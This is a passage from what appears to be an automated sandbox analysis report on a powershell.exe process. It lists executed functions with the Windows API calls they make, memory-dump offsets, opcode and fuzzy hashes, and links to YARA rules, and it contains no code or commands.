                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04FC0860, Relevance: .0, Instructions: 37COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.2159299215.0000000004FC0000.00000040.00000001.sdmp, Offset: 04FC0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 312d9dd999547a0f773457317d014dadedf01ee118a7ebc9711e8d7eccd2f371
                                                                                            • Instruction ID: 1a2d451642d3a38f53a688c472bfadf1ceaccfe91a453f2b9c0df74f4a7154a5
                                                                                            • Opcode Fuzzy Hash: 312d9dd999547a0f773457317d014dadedf01ee118a7ebc9711e8d7eccd2f371
                                                                                            • Instruction Fuzzy Hash: 51F0125260E3D04FC7035B3468650947F72AE9300435F44EBC8C6CF4A3DA085C0AD362
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0278081E, Relevance: .0, Instructions: 27COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.2133344217.0000000002780000.00000040.00000040.sdmp, Offset: 02780000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d8badfe9258479718042118efeb9a197be6aab32543c44fbc3cfaf14e92ced02
                                                                                            • Instruction ID: 187547450d22081bfbe5a6febeea96aa46a967caaa6f2d3ff56a042ddbbe66e8
                                                                                            • Opcode Fuzzy Hash: d8badfe9258479718042118efeb9a197be6aab32543c44fbc3cfaf14e92ced02
                                                                                            • Instruction Fuzzy Hash: 93E092766047009FDB50CF0AFC41452F794EB84A30B18C07FDC0D8B700D235B505CAA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01CF23F4, Relevance: .0, Instructions: 15COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.2126190505.0000000001CF2000.00000040.00000001.sdmp, Offset: 01CF2000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 93e40560d5fccf95c0f15c68a80b776cbe021ab706db2afd511308c24038a70d
                                                                                            • Instruction ID: 5a3be7c96f88813bf415b7ff19543472687bbab2faeb4fdf9350570e4ec6138c
                                                                                            • Opcode Fuzzy Hash: 93e40560d5fccf95c0f15c68a80b776cbe021ab706db2afd511308c24038a70d
                                                                                            • Instruction Fuzzy Hash: ECD05E79204A818FE7178A1CC1A4B953FA4AF55B04F4744FEE940CB6A3C7A8E681E210
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01CF23BC, Relevance: .0, Instructions: 14COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.2126190505.0000000001CF2000.00000040.00000001.sdmp, Offset: 01CF2000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a723b817ab11d567af27d5f7743ca857327e971ec26539f384b32eb289bf0bce
                                                                                            • Instruction ID: 368a7100be013fc3781f381c6e7cbb75c3da8291052acd7b1111fae89e31e05f
                                                                                            • Opcode Fuzzy Hash: a723b817ab11d567af27d5f7743ca857327e971ec26539f384b32eb289bf0bce
                                                                                            • Instruction Fuzzy Hash: 9ED05E743006818FEB15CA1CC194F5977E8AF40B00F0644ECBD008B266C3A4E984C600
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Non-executed Functions

                                                                                            Analysis Process: powershell.exe PID: 1428 Parent PID: 1696 powershell.exeCOMMON

                                                                                            Executed Functions

                                                                                            Function 0074ACB7, Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 0074AD37
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000011.00000002.2128102194.000000000074A000.00000040.00000001.sdmp, Offset: 0074A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: AdjustPrivilegesToken
                                                                                            • String ID:
                                                                                            • API String ID: 2874748243-0
                                                                                            • Opcode ID: 38b01d384d961cd06a75b72f2c5e6047c4ab1fc9b478f3f71c03b6fed6b2b0ab
                                                                                            • Instruction ID: a7d30d602ac857eebe9d40569a9b211fe7acba494adbd3bd2168e8be2a5bcc8a
                                                                                            • Opcode Fuzzy Hash: 38b01d384d961cd06a75b72f2c5e6047c4ab1fc9b478f3f71c03b6fed6b2b0ab
                                                                                            • Instruction Fuzzy Hash: F421D376509780AFEB228F25DC44B92BFB4EF16310F0884DAE9848F563D3359908DB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0074ACEE, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 0074AD37
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000011.00000002.2128102194.000000000074A000.00000040.00000001.sdmp, Offset: 0074A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: AdjustPrivilegesToken
                                                                                            • String ID:
                                                                                            • API String ID: 2874748243-0
                                                                                            • Opcode ID: 651fac6546cb587a865a3edb250eaa148ce62dbd2d83d2d6c95b54c1fb9fb68e
                                                                                            • Instruction ID: b9282140ff339d8558d31142131561e143e90ffa25e74746c6306c0693828209
                                                                                            • Opcode Fuzzy Hash: 651fac6546cb587a865a3edb250eaa148ce62dbd2d83d2d6c95b54c1fb9fb68e
                                                                                            • Instruction Fuzzy Hash: CA115175A00704AFEB20CF55D844B56FBE4EF04311F04C46ADD458BA66D335E814DF62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0074B2CC, Relevance: 1.6, APIs: 1, Instructions: 50nativeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 0074B329
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000011.00000002.2128102194.000000000074A000.00000040.00000001.sdmp, Offset: 0074A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationQuerySystem
                                                                                            • String ID:
                                                                                            • API String ID: 3562636166-0
                                                                                            • Opcode ID: 9aa0735eda30762bd342a535f0cd58992febac42ce7051c19f111165783d54e4
                                                                                            • Instruction ID: cda45e371def4b22fdf4e9d2ef706a09234df5f44f20894aa8c725c980616fd0
                                                                                            • Opcode Fuzzy Hash: 9aa0735eda30762bd342a535f0cd58992febac42ce7051c19f111165783d54e4
                                                                                            • Instruction Fuzzy Hash: 41119A71508380AFDB228F11DC45A62FFB4EF06320F09849AED884B662C275A818DB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0074B2EE, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 0074B329
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000011.00000002.2128102194.000000000074A000.00000040.00000001.sdmp, Offset: 0074A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationQuerySystem
                                                                                            • String ID:
                                                                                            • API String ID: 3562636166-0
                                                                                            • Opcode ID: 240afabf243020795deb92726d7146811d9b9959bcf3f0eab15a57fead5893a7
                                                                                            • Instruction ID: b643cc5bccb152f51eec7d499e4a6f175277fb1321403a9c74c11ea0201ebf69
                                                                                            • Opcode Fuzzy Hash: 240afabf243020795deb92726d7146811d9b9959bcf3f0eab15a57fead5893a7
                                                                                            • Instruction Fuzzy Hash: 7401AD31400700DFEB209F06DC85B25FFA0EF14720F18C49ADD490B612C375E818DB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 021F0118, Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetConsoleTitleW.KERNEL32(?), ref: 021F01D0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000011.00000002.2129608257.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleTitle
                                                                                            • String ID:
                                                                                            • API String ID: 3358957663-0
                                                                                            • Opcode ID: 91a942d02ca78d87282d928193bb7eceec3ab84fee7660e0044638fff2aa51a8
                                                                                            • Instruction ID: 3c9c3bf550e6fae172c0667b9ed0712f00c5d27487a19429436ff3ab6ea94061
                                                                                            • Opcode Fuzzy Hash: 91a942d02ca78d87282d928193bb7eceec3ab84fee7660e0044638fff2aa51a8
                                                                                            • Instruction Fuzzy Hash: B731687654E3C08FE7138B759C65692BFB4AF07210F0E84DBD984CF1A3D6299809CB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 021F067A, Relevance: 1.6, APIs: 1, Instructions: 93fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 021F072D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000011.00000002.2129608257.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: 98a4ede5b9e4f566a0a7b80112975537dfc010ff29c0d26cb3eb7d5b55d7a135
                                                                                            • Instruction ID: 0526d935f0db97f893dccebe952f4e33b3104a20f06fb7f0c13207eee3f56de8
                                                                                            • Opcode Fuzzy Hash: 98a4ede5b9e4f566a0a7b80112975537dfc010ff29c0d26cb3eb7d5b55d7a135
                                                                                            • Instruction Fuzzy Hash: 38318271508380AFE722CF65CC45F56BFF8EF09210F09859EE9898B293D335A808CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 021F0D32, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RegisterEventSourceW.ADVAPI32(?), ref: 021F0DD6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000011.00000002.2129608257.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: EventRegisterSource
                                                                                            • String ID:
                                                                                            • API String ID: 1693822063-0
                                                                                            • Opcode ID: c692db82f5417806da66a157995b879b5e8bb23349b930918fe9a53f83973298
                                                                                            • Instruction ID: b8f871543261fc45916a2edaa51af015e51761497e5c128e09d38a9ad38079d4
                                                                                            • Opcode Fuzzy Hash: c692db82f5417806da66a157995b879b5e8bb23349b930918fe9a53f83973298
                                                                                            • Instruction Fuzzy Hash: 0F31C5B1509380AFE712CB25DC45B96BFE8DF06314F1884AAE984CF293D375A909C771
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0074AF24, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • K32EnumProcessModules.KERNEL32(?,00000E9C,F7D786C6,00000000,00000000,00000000,00000000), ref: 0074AFBE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000011.00000002.2128102194.000000000074A000.00000040.00000001.sdmp, Offset: 0074A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: EnumModulesProcess
                                                                                            • String ID:
                                                                                            • API String ID: 1082081703-0
                                                                                            • Opcode ID: 4a3d25489224d4c9bc27089e204bd5cf1cca32aded858a6300fbc63c88b3dba4
                                                                                            • Instruction ID: 7b7933cab5b5a9e6c7dd16d2f80aa951a96d043784a442d53cbd3ceacf18477f
                                                                                            • Opcode Fuzzy Hash: 4a3d25489224d4c9bc27089e204bd5cf1cca32aded858a6300fbc63c88b3dba4
                                                                                            • Instruction Fuzzy Hash: 3F21A5B2509380AFE7128F60DC45B96BFB8EF06320F0884DBE984DB193D365A949C761
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0074BD1E, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetTokenInformation.KERNELBASE(?,00000E9C,F7D786C6,00000000,00000000,00000000,00000000), ref: 0074BDBC
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000011.00000002.2128102194.000000000074A000.00000040.00000001.sdmp, Offset: 0074A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationToken
                                                                                            • String ID:
                                                                                            • API String ID: 4114910276-0
                                                                                            • Opcode ID: 3aabf690094bd760e4cbe5eeca5e0990030e4f87ee80d2926eaf54d6fac69cf7
                                                                                            • Instruction ID: b3a4b7f89d8eaab2c5010e6a1c25b4a637bc77ed01d4b4b7c7ff0cb5c66ed66b
                                                                                            • Opcode Fuzzy Hash: 3aabf690094bd760e4cbe5eeca5e0990030e4f87ee80d2926eaf54d6fac69cf7
                                                                                            • Instruction Fuzzy Hash: E8319372509380AFE722CB61DC55F96BFB8EF06310F0885DBF985DB192D225A909C7B1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 021F0FEE, Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 021F109E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000011.00000002.2129608257.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationVolume
                                                                                            • String ID:
                                                                                            • API String ID: 2039140958-0
                                                                                            • Opcode ID: 2ad42558fc7078749d31ce97e04ff2d4740dcd3b0771ecf650de0891248f5174
                                                                                            • Instruction ID: b85948d5a61ebc9a52440147e5174a64943126a5dac53a3f1adf7ee163e76b3f
                                                                                            • Opcode Fuzzy Hash: 2ad42558fc7078749d31ce97e04ff2d4740dcd3b0771ecf650de0891248f5174
                                                                                            • Instruction Fuzzy Hash: 9A31717550E3C0AFD3138B358C55B56BFB4AF43610F1A81DBD884CF2A3D629A919C7A2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0074A1A8, Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 0074A23E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000011.00000002.2128102194.000000000074A000.00000040.00000001.sdmp, Offset: 0074A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleCtrlHandler
                                                                                            • String ID:
                                                                                            • API String ID: 1513847179-0
                                                                                            • Opcode ID: fbd7511c36d509d7eaca037e8a86588b0071594a34ef7b97dfe3374bf9278d72
                                                                                            • Instruction ID: ed8ecb4760e73330702a7856c7d23166a3b4cfd17076be113575fc9fd2371081
                                                                                            • Opcode Fuzzy Hash: fbd7511c36d509d7eaca037e8a86588b0071594a34ef7b97dfe3374bf9278d72
                                                                                            • Instruction Fuzzy Hash: 6631F67190D3C0AFD312CB258C95B66BF74EF47210F0D81DBE8848F193D229A919CBA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0074B01D, Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • K32GetModuleInformation.KERNEL32(?,00000E9C,F7D786C6,00000000,00000000,00000000,00000000), ref: 0074B0AE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000011.00000002.2128102194.000000000074A000.00000040.00000001.sdmp, Offset: 0074A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationModule
                                                                                            • String ID:
                                                                                            • API String ID: 3425974696-0
                                                                                            • Opcode ID: 57551476dcc64ec8ef6cb968918894823684fbdaac1ab72c3072b8baa6f59181
                                                                                            • Instruction ID: 0311b1d66a07e77c0ed4a8267080291df1ea2df12831aca6c98c0ae61892e5a8
                                                                                            • Opcode Fuzzy Hash: 57551476dcc64ec8ef6cb968918894823684fbdaac1ab72c3072b8baa6f59181
                                                                                            • Instruction Fuzzy Hash: AA219171509380AFE722CF15CC45FA7BFA8EF06360F08849AE945DB162D768E909CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 021F0784, Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetFileType.KERNELBASE(?,00000E9C,F7D786C6,00000000,00000000,00000000,00000000), ref: 021F0819
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000011.00000002.2129608257.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FileType
                                                                                            • String ID:
                                                                                            • API String ID: 3081899298-0
                                                                                            • Opcode ID: 3fc182a5b6d55903bdd0885bed7182bcc30f24af9fe4fe9cc785f938e9b4cb1d
                                                                                            • Instruction ID: 3ba106a1ee524addae93fc8c90d9607600faaf8126cc71fb949c9010c700bb6a
                                                                                            • Opcode Fuzzy Hash: 3fc182a5b6d55903bdd0885bed7182bcc30f24af9fe4fe9cc785f938e9b4cb1d
                                                                                            • Instruction Fuzzy Hash: 6F210A76408780AFE712CB159C41FA3BFA8EF46720F0981DBF9848B197D324A909C771
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 021F0464, Relevance: 1.6, APIs: 1, Instructions: 77COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 021F0502
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000011.00000002.2129608257.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FolderPath
                                                                                            • String ID:
                                                                                            • API String ID: 1514166925-0
                                                                                            • Opcode ID: 0f84134d835742c2f19a7caf95ebf0655f7bbc0caa73493521d88d93483c71c4
                                                                                            • Instruction ID: 084bde47d9dff018d4b3f88b87de5756e408bb16698b2144e519c33a5bb79013
                                                                                            • Opcode Fuzzy Hash: 0f84134d835742c2f19a7caf95ebf0655f7bbc0caa73493521d88d93483c71c4
                                                                                            • Instruction Fuzzy Hash: CB21607540E3C0AFD3128B258C55B66BFB4EF47610F1A81CBD8848F693D225A919C7A2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 021F06AE, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 021F072D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000011.00000002.2129608257.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: 9286deaa5304ef2915f43ef1b567187dbcaf0c7a357b29a6c76a419a765e28b0
                                                                                            • Instruction ID: 9350b899e2f3556cd3a8cb174a16e259e42a0153ef3e12aa7e21f386b4e010b7
                                                                                            • Opcode Fuzzy Hash: 9286deaa5304ef2915f43ef1b567187dbcaf0c7a357b29a6c76a419a765e28b0
                                                                                            • Instruction Fuzzy Hash: F121AE71500300EFEB20DF65CC85F66FBE8EF08250F0485AAEA898B296D331E804CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 021F0854, Relevance: 1.6, APIs: 1, Instructions: 75fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ReadFile.KERNELBASE(?,00000E9C,F7D786C6,00000000,00000000,00000000,00000000), ref: 021F08E5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000011.00000002.2129608257.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FileRead
                                                                                            • String ID:
                                                                                            • API String ID: 2738559852-0
                                                                                            • Opcode ID: d8ba5d0a7b1aafb16450fe8aaaca3ea4e60b0222b262f334b04ec9599fdcdf43
                                                                                            • Instruction ID: eb118803c701e89fd2f7bd52e7e001eee2a22098c2c90a00d47368135a0c9f14
                                                                                            • Opcode Fuzzy Hash: d8ba5d0a7b1aafb16450fe8aaaca3ea4e60b0222b262f334b04ec9599fdcdf43
                                                                                            • Instruction Fuzzy Hash: 0D219271409380AFE722CF51DC45F56BFB8EF06314F09849BE9449B153C265A909CB65
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0074A8B4, Relevance: 1.6, APIs: 1, Instructions: 74threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 0074A94A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000011.00000002.2128102194.000000000074A000.00000040.00000001.sdmp, Offset: 0074A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: LanguagesPreferredThread
                                                                                            • String ID:
                                                                                            • API String ID: 842807343-0
                                                                                            • Opcode ID: cdc94ca3c8dfad84b9a1e3cede81a5977e2902ac15f6232b37b1018a7b65ebc1
                                                                                            • Instruction ID: 0a7bae05cb6f724660227fbade1465f5ee3b4be695cab2cf75ec51987418b893
                                                                                            • Opcode Fuzzy Hash: cdc94ca3c8dfad84b9a1e3cede81a5977e2902ac15f6232b37b1018a7b65ebc1
                                                                                            • Instruction Fuzzy Hash: E921A77540D780AFD3138B25DC51B62BFB4EF87710F1981DBE8848B653D224A919C7B6
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 021F0D66, Relevance: 1.6, APIs: 1, Instructions: 71registryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RegisterEventSourceW.ADVAPI32(?), ref: 021F0DD6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000011.00000002.2129608257.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: EventRegisterSource
                                                                                            • String ID:
                                                                                            • API String ID: 1693822063-0
                                                                                            • Opcode ID: 4b60cdacfb2e87d7b80d2c4e24d129f907e51616a2a064a61d5106fc9981477b
                                                                                            • Instruction ID: f552533c8bc7842d325ed59b1751bd10e310798454c5f1e16faf42ab5f3c19ff
                                                                                            • Opcode Fuzzy Hash: 4b60cdacfb2e87d7b80d2c4e24d129f907e51616a2a064a61d5106fc9981477b
                                                                                            • Instruction Fuzzy Hash: 8D21AEB1640200AFF760DF25CC85BA6FBD8EF08250F14846AE948DB286E776F804CA65
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0074BD52, Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetTokenInformation.KERNELBASE(?,00000E9C,F7D786C6,00000000,00000000,00000000,00000000), ref: 0074BDBC
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000011.00000002.2128102194.000000000074A000.00000040.00000001.sdmp, Offset: 0074A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationToken
                                                                                            • String ID:
                                                                                            • API String ID: 4114910276-0
                                                                                            • Opcode ID: d911f8a334db50dd49310e80dd5784942296fdb9d9b625af20f0df3ec32f72b8
                                                                                            • Instruction ID: 9bf9c141086f8fc3172571208a8cd5b04a63cc75c3178ad9a212ca125fddfe62
                                                                                            • Opcode Fuzzy Hash: d911f8a334db50dd49310e80dd5784942296fdb9d9b625af20f0df3ec32f72b8
                                                                                            • Instruction Fuzzy Hash: 22119D72500304EFEB21DF51DC85FAAFBACEF04320F14856AF9459A141D775E9048BB1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 021F0F34, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetDriveTypeW.KERNELBASE(?), ref: 021F0FB0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000011.00000002.2129608257.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: DriveType
                                                                                            • String ID:
                                                                                            • API String ID: 338552980-0
                                                                                            • Opcode ID: 61a82d73d2ccbf795022281b5fa14160273654ccf09fdebe7f5e67862280d899
                                                                                            • Instruction ID: db6f655a7df997b9793eca79d05ac4b3e41ae53d0e07ccf4617a6bdc0dc111ad
                                                                                            • Opcode Fuzzy Hash: 61a82d73d2ccbf795022281b5fa14160273654ccf09fdebe7f5e67862280d899
                                                                                            • Instruction Fuzzy Hash: 51216D7150D3C09FDB12CB25DC55B92BFB4AF07224F0D84DAE9888F297D265A808CB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 021F137E, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000011.00000002.2129608257.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleWrite
                                                                                            • String ID:
                                                                                            • API String ID: 2657657451-0
                                                                                            • Opcode ID: ac60fe88a35dba04eb308fc1e1b55c94a89f630d6ff3e1be343afb45234a344a
                                                                                            • Instruction ID: 28822a8f5956277b69b66d2bcaf3091375f230c8404f2adb68c6c885ab87b142
                                                                                            • Opcode Fuzzy Hash: ac60fe88a35dba04eb308fc1e1b55c94a89f630d6ff3e1be343afb45234a344a
                                                                                            • Instruction Fuzzy Hash: 2721A172508380AFEB21CF25DC45B96FFF4EF06220F0884AEED858B562D335A449DB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0074B04A, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • K32GetModuleInformation.KERNEL32(?,00000E9C,F7D786C6,00000000,00000000,00000000,00000000), ref: 0074B0AE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000011.00000002.2128102194.000000000074A000.00000040.00000001.sdmp, Offset: 0074A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationModule
                                                                                            • String ID:
                                                                                            • API String ID: 3425974696-0
                                                                                            • Opcode ID: 8e75938b139b076a1c5bb5b7ca83bd28d95d30dae8575d478d03f35310ffaaed
                                                                                            • Instruction ID: 98f1797ec00dcff191eab40c8efc95533d1115220b404764782528e48cd02d29
                                                                                            • Opcode Fuzzy Hash: 8e75938b139b076a1c5bb5b7ca83bd28d95d30dae8575d478d03f35310ffaaed
                                                                                            • Instruction Fuzzy Hash: 9C117971600300EFEB20DF15DC85FABFBA8EF04761F14846AE909DB291D774E9088AB1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0074BABE, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000011.00000002.2128102194.000000000074A000.00000040.00000001.sdmp, Offset: 0074A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleMode
                                                                                            • String ID:
                                                                                            • API String ID: 4145635619-0
                                                                                            • Opcode ID: e5e0a2cac1ba2ece0e2e3ce426c1885c0c26adc13a17041efebecf6e865a0095
                                                                                            • Instruction ID: 368e05e5b56777cf6aade7f1f5638ea66940913045ad1a26801942ca87c03e25
                                                                                            • Opcode Fuzzy Hash: e5e0a2cac1ba2ece0e2e3ce426c1885c0c26adc13a17041efebecf6e865a0095
                                                                                            • Instruction Fuzzy Hash: 8521A4715093C09FDB128F25DC55A92BFA4EF07310F0984DBDD858F163D224A908DB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0074AAAB, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 0074AB1A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000011.00000002.2128102194.000000000074A000.00000040.00000001.sdmp, Offset: 0074A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: LookupPrivilegeValue
                                                                                            • String ID:
                                                                                            • API String ID: 3899507212-0
                                                                                            • Opcode ID: 7d3ddb2215398517004cfb2a100dd95c19042cdbd31ef696e1206ef02d214551
                                                                                            • Instruction ID: 8a6fd3699d1acc673405ce8fb48cea7c3360ac5be16607fdb0abe5467c75af81
                                                                                            • Opcode Fuzzy Hash: 7d3ddb2215398517004cfb2a100dd95c19042cdbd31ef696e1206ef02d214551
                                                                                            • Instruction Fuzzy Hash: 882175B1605380AFDB21CF25DC44B52FFE8EF56250F0884AAED45DB252D365E804C761
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 021F10D4, Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetThreadUILanguage.KERNEL32(?), ref: 021F1148
                                                                                            Memory Dump Source
